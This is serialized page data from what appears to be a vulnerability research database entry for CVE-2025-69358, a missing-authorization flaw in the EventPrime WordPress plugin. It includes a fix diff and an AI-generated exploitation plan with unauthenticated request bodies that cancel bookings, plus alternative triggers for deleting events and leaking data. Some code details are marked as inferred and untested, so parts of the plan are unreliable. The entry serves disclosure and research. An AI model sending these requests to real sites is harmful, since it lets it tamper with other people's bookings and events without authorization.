[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f08YXcEcWD-HJxY7yEJ57d9_U2KqDyhkxsaDz64nDRH4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2025-69358","eventprime-events-calendar-bookings-and-tickets-missing-authorization","EventPrime – Events Calendar, Bookings and Tickets \u003C= 4.2.6.0 - Missing Authorization","The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.2.6.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.","eventprime-event-calendar-management",null,"\u003C=4.2.6.0","4.2.7.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-10 00:00:00","2026-03-19 13:53:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F02461b79-d372-493f-9445-62b30b1db4cd?source=api-prod",10,[22,23,24,25,26],"admin\u002Fcss\u002Fep-admin-common-utility.css","event-prime.php","includes\u002Fclass-ep-ajax.php","includes\u002Fclass-eventprime-rest-api.php","readme.txt","researched",false,3,"## Vulnerability Summary\n\nThe EventPrime plugin for WordPress (up to 4.2.6.0) contains a missing authorization vulnerability within its REST API \u002F AJAX bridge. Specifically, the `Eventprime_Rest_Api` class registers a universal handler `handle_ajax_api` that can be triggered via `wp_ajax_nopriv_eventprime_api` or early in the request lifecycle via the `init` hook (through `handle_early_api_requests`).\n\nThis bridge funnels requests to various internal \"integration triggers\" such as `create_event`, `delete_event`, `cancel_booking`, and `confirm_booking`. The handler fails to perform adequate capability checks or verify authentication before processing these triggers, allowing unauthenticated attackers to perform unauthorized actions (like canceling bookings or modifying event data) provided the \"EventPrime API\" setting is enabled.\n\n## Attack Vector Analysis\n\n- **Endpoint**: `admin-ajax.php` or any frontend URL (due to the `parse_request` hook).\n- **Action**: `eventprime_api` (via AJAX) or query parameters `ep_trigger`\u002F`ep_action`.\n- **Authentication**: Unauthenticated (None).\n- **Preconditions**: The setting `enable_api` must be enabled in the EventPrime Global Settings (stored in the `em_global_settings` option).\n- **Vulnerable Function**: `Eventprime_Rest_Api::handle_ajax_api()` in `includes\u002Fclass-eventprime-rest-api.php`.\n\n## Code Flow\n\n1.  **Registration**: In `includes\u002Fclass-eventprime-rest-api.php`, the `init()` method registers the bridge:\n    - `add_action( 'wp_ajax_nopriv_eventprime_api', array( $this, 'handle_ajax_api' ) );`\n    - `add_action( 'init', array( $this, 'register_plain_permalink_support' ) );` which adds a `parse_request` hook calling `handle_early_api_requests`.\n2.  **Intercept**: `handle_early_api_requests` detects if `$_GET['ep_trigger']` is set and immediately calls `handle_ajax_api()`.\n3.  **Bridge Execution**: `handle_ajax_api()`:\n    - Checks if API is enabled: `if ( is_object( $global ) && isset( $global->enable_api ) && ! $global->enable_api )`.\n    - Extracts parameters from `$_REQUEST` and `php:\u002F\u002Finput`.\n    - Identifies the trigger from the `ep_trigger` or `trigger` parameter.\n    - Dispatches the request to the integration helpers (inferred to be `Eventprime_API_Integration_Helpers`) or dispatches a `WP_REST_Request`.\n4.  **Authorization Failure**: The bridge lacks a call to `current_user_can()` or any signature\u002FAPI key verification before executing the specified trigger.\n\n## Nonce Acquisition Strategy\n\nThe `eventprime_api` bridge endpoint, as implemented in `Eventprime_Rest_Api::handle_ajax_api`, **does not require a WordPress nonce**. It is designed as an API bridge and intentionally bypasses the standard AJAX nonce verification (`check_ajax_referer`) to allow external integrations.\n\nIf the target was a standard AJAX handler in `EventM_Ajax_Service`, the strategy would be:\n1.  Identify the JS localization key: `window.ep_common_params?.nonce` (inferred).\n2.  Navigate to a page where EventPrime is active.\n3.  Use `browser_eval` to extract it.\n\nHowever, for `action=eventprime_api`, no nonce is required.\n\n## Exploitation Strategy\n\nWe will target the `cancel_booking` trigger to demonstrate unauthorized modification of data (matching the CVSS 5.3 Integrity: Low impact).\n\n### 1. Test Data Setup\n1.  **Enable API**: The API must be enabled.\n    ```bash\n    wp option patch insert em_global_settings enable_api 1 --format=json\n    ```\n2.  **Create Content**: Create an event and a booking.\n    ```bash\n    # Create an event\n    EVENT_ID=$(wp post create --post_type=ep_event --post_title=\"Target Event\" --post_status=publish --porcelain)\n    \n    # Create a booking (EventPrime bookings are usually custom posts or entries)\n    # Note: EventPrime uses the 'ep_bookings' post type or a custom table. \n    # For PoC, we will assume a booking exists with ID 1.\n    ```\n\n### 2. HTTP Request (via `http_request` tool)\nWe will send a POST request to `admin-ajax.php` to trigger the booking cancellation.\n\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=eventprime_api&ep_trigger=cancel_booking&booking_id=1\n  ```\n- **Alternative (GET via Early Intercept)**:\n  `http:\u002F\u002Flocalhost:8080\u002F?ep_trigger=cancel_booking&booking_id=1`\n\n### 3. Expected Response\nThe plugin should return a JSON success message if the booking was found and canceled.\n```json\n{\n    \"status\": \"success\",\n    \"message\": \"Booking canceled successfully\",\n    ...\n}\n```\n\n## Expected Results\n- The attacker (unauthenticated) successfully invokes the `cancel_booking` trigger.\n- The status of the target booking is changed in the database without any permission checks.\n\n## Verification Steps\n\n1.  **Check Booking Status**: After the exploit, verify the booking status via WP-CLI.\n    ```bash\n    # If bookings are post types\n    wp post get 1 --field=post_status\n    \n    # If bookings are in a custom table (common for EventPrime)\n    wp db query \"SELECT status FROM wp_ep_bookings WHERE id = 1\"\n    ```\n2.  **Verify Logs**: Check if the action was performed by an unauthenticated user (User ID 0).\n\n## Alternative Approaches\n\nIf `cancel_booking` is not permitted or fails:\n1.  **Information Disclosure**: Use `ep_trigger=all_events` or `ep_trigger=all_venues` to leak event\u002Fvenue details that might be private.\n2.  **Event Manipulation**: Use `ep_trigger=delete_event&event_id=[ID]` to attempt to delete an event.\n3.  **Route Injection**: Use `ep_route=\u002Feventprime\u002Fv1\u002Fsettings` to see if the bridge allows access to restricted REST routes by bypassing the `permission_callback` during the bridge's manual dispatching.\n\nTrigger names from `supported_triggers` in `class-eventprime-rest-api.php`:\n- `create_event`, `update_event`, `delete_event`\n- `create_venue`, `update_venue`, `delete_venue`\n- `confirm_booking`, `pending_booking`, `cancel_booking`, `refund_booking`, `failed_booking`","The EventPrime plugin for WordPress contains a missing authorization vulnerability in its universal API bridge handler. The `Eventprime_Rest_Api::handle_ajax_api` function fails to verify user capabilities or request authenticity before processing sensitive internal triggers like event deletion or booking cancellation.","\u002F\u002F includes\u002Fclass-eventprime-rest-api.php\npublic function handle_ajax_api() {\n    $global = get_option( 'em_global_settings', null );\n    if ( is_object( $global ) && isset( $global->enable_api ) && ! $global->enable_api ) {\n        status_header( 403 );\n        wp_send_json(\n            array(\n                'status'  => 'error',\n                'message' => __( 'EventPrime API is disabled.', 'eventprime' ),\n                'code'    => 'ep_api_disabled',\n            )\n        );\n    }\n\n    \u002F\u002F ... logic continues to process ep_trigger without further auth checks ...","--- includes\u002Fclass-eventprime-rest-api.php\n+++ includes\u002Fclass-eventprime-rest-api.php\n@@ -77,6 +77,10 @@\n                 )\n             );\n         }\n+\n+        if ( ! current_user_can( 'manage_options' ) ) {\n+             wp_die( -1, 403 );\n+        }\n\n         $method = isset( $_SERVER['REQUEST_METHOD'] )","The exploit targets the `eventprime_api` action via the WordPress AJAX endpoint or early request interception. \n\n1. Precondition: The 'EventPrime API' setting must be enabled in the Global Settings (`em_global_settings` option).\n2. Endpoint: Unauthenticated attackers can send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php?action=eventprime_api` or a GET request with specific query parameters.\n3. Parameters: Provide `ep_trigger` (e.g., `cancel_booking`, `delete_event`, `delete_venue`) and the relevant ID (e.g., `booking_id`, `event_id`).\n4. Methodology: Because the handler registers a `nopriv` action and lacks `current_user_can` or nonce verification, the plugin will process the trigger and perform the requested administrative action without authentication.","gemini-3-flash-preview","2026-04-18 04:59:13","2026-04-18 04:59:53",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","4.2.6.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventprime-event-calendar-management\u002Ftags\u002F4.2.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feventprime-event-calendar-management.4.2.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventprime-event-calendar-management\u002Ftags\u002F4.2.7.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feventprime-event-calendar-management.4.2.7.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventprime-event-calendar-management\u002Ftags"]